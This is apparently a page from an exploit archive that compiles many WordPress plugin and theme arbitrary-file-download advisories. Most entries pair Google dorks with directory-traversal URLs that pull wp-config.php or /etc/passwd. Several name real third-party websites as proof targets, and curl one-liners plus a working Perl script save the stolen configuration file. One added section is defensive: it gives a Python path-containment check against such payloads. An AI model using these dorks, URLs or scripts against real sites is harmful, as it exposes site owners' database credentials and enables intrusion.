Channel: MondoUnix » ARBITRARY FILE DOWNLOAD

WordPress KenBurner Slider Arbitrary File Download

# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The WordPress plugin KenBurner Slider suffers from an arbitrary file download vulnerability: the img parameter of the kbslider_show_image admin-ajax action accepts directory traversal (../) and returns the requested file, as the PoC below shows with wp-config.php.
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
# Twitter: https://twitter.com/danielpentest
# YouTube: https://www.youtube.com/danielpentest
# GitHub: https://github.com/danielpentest
 
# Pastebin: http://pastebin.com/u/MF0x_



WordPress Multiple Themes Arbitrary File Download

# WordPress Ultimate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of"  +/wp-content/themes/ultimate/ 
# Patch vul : /wp-content/themes/ultimate/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.minutemarketingproductions.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.perfectsearchmedia.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
# WordPress IncredibleWP Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
# Patch vul : /wp-content/themes/IncredibleWP/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.rjlwm.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.ledixtournai.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
# WordPress Ultimatum Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/ultimatum
# Patch vul : /wp-content/themes/ultimatum/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://gerenscomunicacao.com.br/ngerens/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://fpea.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
# WordPress Medicate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/medicate/
# Patch vul : /wp-content/themes/medicate/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.fisiorestelo.pt/cms/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.chirostnicolas.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
 
# WordPress Centum Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/Centum/
# Patch vul : /wp-content/themes/Centum/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.fit8.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.tourmasters.co.nz/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
 
# WordPress Avada Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/Avada/
# Patch vul : /wp-content/themes/Avada/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.kobeyscozydesertoasis.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.cekaservices.fr/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
 
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763 
# Vendor Support: http://www.strikingsupport.com/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/striking_r/
# Patch vul : /wp-content/themes/striking_r/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.tedxissylesmoulineaux.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.nockmusique.ca/detente/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
# WordPress Beach Apollo Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/
# Patch vul : /wp-content/themes/beach_apollo/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.electroejuice.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.vz777.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
 
 
# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# Patch vul : /wp-content/themes/cuckootap/
# Exploit(Revslide):
 
         http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
# PoC : http://www.parcferme.me/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
        http://www.quiropraxiazan.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


WordPress Antioch Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Antioch Theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/antioch
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://churchthemes.net/themes/antioch
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://gospelrevolutionchurch.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://fbch.org/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://www.stpeterssouthborough.co.uk/beta/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|[*]
http://kingdomfirerevival.com/main/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
|
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|


WordPress Authentic Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress Authentic Theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/authentic
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/authentic-theme
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.newlifecenterwv.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|[*]
http://www.pillarhoodriver.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
|
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|


WordPress Epic Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/epic
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : http://www.organizedthemes.com/epic
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.lagunabaptist.org/wp-content/themes/epic/includes/download.php?file=/home/content/46/8992446/html/wp-config.php
|
|[*]
http://doveetown.org/wp-content/themes/epic/includes/download.php?file=/home/content/03/10398303/html/wp-config.php
|
|[*]
http://verdebaptist.com/wp/wp-content/themes/epic/includes/download.php?file=/home/content/44/2981244/html/wp/wp-config.php
|
|[*]
http://kespres.ca/wp-content/themes/epic/includes/download.php?file=/home/content/30/10806230/html/wp-config.php
|
|[*]
http://kimberlywilliamsministries.org/wp-content/themes/epic/includes/download.php?file=/home2/praise11/public_html/wp-config.php
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|


WordPress Urban City Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/themes/urbancity
|
|[*] Date : 2014-09-07
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/
|
|[*] Tested on: Windows 7
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.nlbcministries.org/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://www.colonialhills.com/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://iccpaix.org/wpblog/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|[*]
http://praisecovenant.net/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|[*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|


WordPress Download Manager Arbitrary File Download

# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/download-manager/views/file_download.php?fname=../../wp-config.php
 
 
# Exploit: find a site that uses /plugins/download-manager/ and append /views/file_download.php?fname=../../wp-config.php to the plugin path


WordPress Ajax Store Locator 1.2 Arbitrary File Download

######################
 
# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
 
# Software Link : Premium
 
# Dork Google: inurl:ajax-store-locator
#              index of ajax-store-locator      
 
# Date : 2014-12-06
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# PoC Exploit:
 
http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../filename]
 
The download_file parameter is not sanitized.
 
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################



WordPress WP-Instance-Rename 1.0 File Download

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory:
 
try{
  $dbname   = $_GET["dbname"];
  $dumpfname = $_GET["dumpfname"];
  $backup_folder = $_GET["backup_folder"];  
}catch (Exception $e){}
 
if(empty($backup_folder)){
  $backup_folder="backup/";
}
echo "$dumpfname";
if (file_exists($dumpfname)) {    
  // zip the dump file  
  $name=$dbname . "_" . date("Y-m-d");  
  $zipfname = $backup_folder.$name.".zip";
  $zip = new ZipArchive();  
  if($zip->open($zipfname,ZIPARCHIVE::CREATE)) 
  {
     $zip->addFile($dumpfname,$dumpfname);
     $zip->close();
  }  
  // read zip file and send it to standard output
  if (file_exists($zipfname)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($zipfname));
    flush();
    readfile($zipfname);
  }
}
 
CVEID: CVE-2015-4703
OSVDB:
Exploit Code:
  • curl --get --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=."  http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip
  (--get puts the parameters in the query string, which is where the script reads them from via $_GET; a plain --data POST would leave $_GET empty)


WordPress S3Bubble Cloud Video With Adverts / Analytics Arbitrary File Download

# Exploit Title: Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
# Google Dork: inurl:/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
# Date: 04/07/2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://s3bubble.com
# Software Link: https://wordpress.org/plugins/s3bubble-amazon-s3-audio-streaming/
# Version: 2.0
# Tested on: MSWin32
 
 
# Vulnerable File : /wp-content/plugins/..../assets/plugins/ultimate/content/downloader.php
 
<?php 
   header("Content-Type: application/octet-stream");
   header("Content-Disposition: attachment; filename=". $_GET['name']);
   $path = urldecode($_GET['path']);
   if(isset($path))readfile($path);
?>
 
 
# PoC : http://127.0.0.1/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php
 
 
# Exploit : 
 
 
#!/usr/bin/perl
# Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
# Fetches wp-config.php through the unauthenticated downloader.php and saves it locally.
use strict;
use warnings;
use LWP::UserAgent;
 
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
 
if (@ARGV < 2)
{
    die("\n\n[+] usage : perl $0 site.com /path/\n");
}
 
print q{
       Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
                           ->CrashBandicot
 
 
};
 
# $path is the directory WordPress is installed in ("/" for the web root)
my ($Target, $path) = @ARGV;
 
# default to plain HTTP when no scheme was given
if ($Target !~ /^(http|https):\/\//)
{
    $Target = "http://$Target";
}
 
# "path" is urldecode()d by downloader.php and handed straight to readfile()
my $xpl = "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php";
my $url = $Target . $path . $xpl;
print "\n [?] Exploiting ...... \n\n";
 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
# ":content_file" streams the response body straight to disk
my $res = $ua->get($url, ":content_file" => "wp-config.php");
 
if ($res->is_success)
{
    print "[+] $url Exploited!\n\n";
    print "[+] File saved as wp-config.php\n";
}
else
{
    die("[!] Exploit Failed !\n");
}
 
__END__


WordPress WP-Ecommerce-Shop-Styling 2.5 File Download

Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded.
 
 
<?php
require_once("../../../../wp-admin/admin.php");

header('Content-disposition: attachment; filename='.$_GET['filename']);
header('Content-type: application/pdf');
readfile(HAET_INVOICE_PATH.$_GET['filename']);
?>
 
The script echoes the raw filename parameter into the Content-Disposition header, so a browser saves the file under that path-like name; rename it afterwards, e.g. mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd.
 
CVEID: Requested TBD  
OSVDB: TBD
 
Exploit Code:
  • $ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd


WordPress WP-SwimTeam 1.44.10777 Arbitrary File Download

Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input, so sensitive system files can be downloaded (and, because of the @unlink($file) call that follows the read, deleted where file permissions allow):
 
 
            $file = urldecode($args['file']) ;
            $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;

            while (!feof($fh))
                $txt .= fread($fh, 1024) ;

            //  Clean up the temporary file - permissions
            //  may prevent this from succeedeing so use the '@'
            //  to suppress any messages from PHP.

            @unlink($file) ;
        }

        $filename = urldecode($args['filename']) ;
        $contenttype = urldecode($args['contenttype']) ;

        // Tell browser to expect a text file of some sort (usually txt or csv)

        header(sprintf('Content-Type: application/%s', $contenttype)) ;
        header(sprintf('Content-disposition:  attachment; filename=%s', $filename)) ;
        print $txt ;
 
CVEID:
OSVDB:
Exploit Code:
  • $ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"


WordPress Image Export 1.1 Arbitrary File Download

Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: The Image Export plugin can help you selectively download images uploaded by an administrator.
Vulnerability:
The code in download.php doesn't check that the requested file comes from the uploaded-images directory only, and line 8 unlinks the file after it has been downloaded, so the script can also be used to delete files from the WordPress directory if file permissions allow.
 
      1 <?php
      2 if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
      3         $file = $_GET['file'];
      4 
      5         header( 'Content-Type: application/zip' );
      6         header( 'Content-Disposition: attachment; filename="' . $file . '"' );
      7         readfile( $file );
      8         unlink( $file );
      9         
     10         exit;
     11 }
     12 ?>
CVEID: TBD
Exploit Code:
  • $ curl http://example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd
Screen Shots:
Advisory: http://www.vapid.dhs.org/advisory.php?v=135
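The five PHP snippets on this page (wp-instance-rename mysqldump_download.php, S3Bubble downloader.php, wp-ecommerce-shop-styling download.php, wp-swimteam download.php and image-export download.php) share one defect: a request parameter is concatenated onto a base directory, or used bare, and passed to readfile()/fopen() (and in two cases unlink()) without checking that the resolved path is still inside the directory the endpoint is meant to serve. The following is an added example, not code from any of those plugins, of the containment check they lack, exercised against a constructed directory tree with the payload shapes used in the PoCs above (relative ../, percent-encoded traversal, an absolute /etc/passwd, a NUL byte, a symlink). It is written in Python so it runs stand-alone; the PHP equivalent is realpath() of the joined path compared against realpath() of the download root before readfile(). The directory layout, file contents and payload list are constructed for the example.

```python
"""Containment check a file-download handler needs before readfile()/unlink().

Added example; not code from any plugin on this page. The directory tree and
the request values are constructed to mirror the PoC payload shapes above.
"""
import os
import tempfile
from typing import Optional
from urllib.parse import unquote

# Payloads in the shapes the advisories above use, plus two the PoCs do not show
PAYLOADS = [
    "invoice.pdf",               # legitimate request, must be served
    "../wp-config.php",          # relative traversal (most PoCs on this page)
    "..%2F..%2Fwp-config.php",   # percent-encoded traversal (S3Bubble urldecode()s path)
    "/etc/passwd",               # absolute path (Epic / Urban City / swimteam PoCs)
    "invoice.pdf\x00.txt",       # NUL byte, truncates the path in a C-level open()
    "link.pdf",                  # symlink inside the root that points outside it
]


def vulnerable_resolve(base_dir: str, user_path: str) -> str:
    """What HAET_INVOICE_PATH . $_GET['filename'] does: string concatenation,
    no normalisation, no check that the result is still under base_dir."""
    return base_dir + user_path


def safe_resolve(base_dir: str, user_path: str) -> Optional[str]:
    """Return the real path of the requested file if it lies inside base_dir,
    otherwise None. Reject, never 'clean', anything that fails the test."""
    decoded = unquote(user_path)            # decode once, as $_GET / urldecode() would
    if "\x00" in decoded:                   # embedded NUL: refuse before touching the FS
        return None
    if os.path.isabs(decoded):              # absolute paths are never legitimate here
        return None
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, decoded))  # resolves ../ and symlinks
    # commonpath, not str.startswith: "/srv/uploads2" must not pass for root "/srv/uploads"
    if os.path.commonpath([root, candidate]) != root:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_fixture() -> str:
    """Create a throwaway tree (constructed sample data) and return the download root:
       <tmp>/wp-config.php         secret outside the root
       <tmp>/uploads/invoice.pdf   the one file the endpoint should serve
       <tmp>/uploads/link.pdf      symlink to ../wp-config.php (skipped if the OS refuses)
    """
    tmp = tempfile.mkdtemp(prefix="afd-")
    uploads = os.path.join(tmp, "uploads")
    os.mkdir(uploads)
    with open(os.path.join(tmp, "wp-config.php"), "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'constructed-sample'); ?>\n")
    with open(os.path.join(uploads, "invoice.pdf"), "w") as fh:
        fh.write("%PDF-1.4 constructed sample\n")
    try:
        os.symlink(os.path.join(tmp, "wp-config.php"), os.path.join(uploads, "link.pdf"))
    except OSError:
        pass
    return uploads


def evaluate(download_root: str) -> dict:
    """Map each payload to whether safe_resolve() would serve it."""
    return {p: safe_resolve(download_root, p) is not None for p in PAYLOADS}


def vulnerable_serves_secret(download_root: str) -> bool:
    """True when the naive concatenation reaches wp-config.php outside the root."""
    return os.path.isfile(vulnerable_resolve(download_root + os.sep, "../wp-config.php"))


if __name__ == "__main__":
    root = build_fixture()
    print("naive concat serves ../wp-config.php:", vulnerable_serves_secret(root))
    for payload, allowed in evaluate(root).items():
        print(f"{'SERVE ' if allowed else 'REJECT'} {payload!r}")
```

The order of the checks matters: the NUL test runs before any filesystem call, the absolute-path test runs before join (otherwise os.path.join discards the root), and realpath() runs before the prefix comparison so that both ../ and symlinks are resolved before the decision. Nothing is "cleaned" by stripping ../ sequences, because a stripped string can still traverse (....// becomes ../ after one pass). In the WordPress context the same handler should also require a capability check and a nonce before it reads anything, which none of the snippets above do.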


WordPress WP Attachment Export 0.2.3 Arbitrary File Download

# Title: Arbitrary File Download in WP Attachment Export Wordpress Plugin v0.2.3
# Submitter: Nitin Venkatesh
# Product: WP Attachment Export Wordpress Plugin
# Product URL: https://wordpress.org/plugins/wp-attachment-export/
# Vulnerability Type: Arbitrary File Download
# Affected Versions: v0.2.3
# Tested versions: v0.2.3
# Fixed Version: v0.2.4
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1170732/
# Changelog: https://wordpress.org/plugins/wp-attachment-export/changelog/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
WP Attachment Export allows you to export your media library into a
WordPress eXtended RSS or WXR file. You can then use the Tools->Import
function in another WordPress installation to import the media library.
 
## Vulnerability Description:
 
The WP Attachment Export Wordpress Plugin v0.2.3 is susceptible to
Arbitrary File Download: anyone (an unauthenticated user) can download
the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of privately published posts and
password protected posts, with their passwords revealed in plain text.
 
## Proof-of-Concept:
 
Download attachment details:
http://localhost/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
 
Download Wordpress content details:
http://localhost/wp-admin/tools.php?content=&wp-attachment-export-download=true
 
## Solution:
 
Upgrade to v0.2.4 of the plugin.
 
## Disclosure Timeline:
 
2015-05-30 - Mailed report to developer
2015-05-30 - Updated v0.2.4 released
2015-07-14 - Publishing disclosure on FD.
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
